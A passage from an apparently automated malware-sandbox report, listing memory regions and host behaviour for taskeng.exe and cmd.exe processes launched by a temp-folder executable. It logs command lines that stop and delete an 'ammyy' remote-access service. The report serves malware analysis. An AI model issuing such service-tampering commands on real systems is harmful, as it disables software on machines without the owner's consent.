|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Process #8: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {F0BF9717-EB8A-4C23-8803-85A71A393FD9} S-1-5-21-1335525288-214869617-2635229968-1000:EXB9WSP\qj4SUKboE:Interactive:LUA[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:11, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf0 |
| Parent PID | 0x334 (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BEC
0x
BE8
0x
BE4
0x
BDC
0x
830
0x
370
0x
418
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001b60000 | 0x01b60000 | 0x01f52fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x0212ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x021bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x0234ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02350000 | 0x0261efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x027fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x029cefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| taskeng.exe | 0xfffb0000 | 0x100023fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| tschannel.dll | 0x7fefa630000 | 0x7fefa638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ktmw32.dll | 0x7fefaa20000 | 0x7fefaa29fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| xmllite.dll | 0x7fefb730000 | 0x7fefb764fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7fefb770000 | 0x7fefb787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbb50000 | 0x7fefbba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc930000 | 0x7fefc976fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefcc30000 | 0x7fefcc46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wevtapi.dll | 0x7fefce60000 | 0x7fefceccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7fefd200000 | 0x7fefd224fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd230000 | 0x7fefd23efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x7fefd320000 | 0x7fefd333fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefd710000 | 0x7fefd912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefd970000 | 0x7fefd98efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefdda0000 | 0x7fefde76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe0d0000 | 0x7fefe1fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7fefe2a0000 | 0x7fefe37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefe590000 | 0x7fefe628fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe8f0000 | 0x7fefe960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Process #10: cmd.exe
56
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C net.exe stop ammyy |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb84 |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
404
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x007cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00957fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001f30000 | 0x01f30000 | 0x02272fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02280000 | 0x0254efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4abe0000 | 0x4ac2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x74bc0000 | 0x74bc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Get Info | net.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0x8d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4abe0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:12 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10926200 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C sc delete ammyy |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb7c |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c30000 | 0x01c30000 | 0x01f72fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01f80000 | 0x0224efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4abe0000 | 0x4ac2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x74bc0000 | 0x74bc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
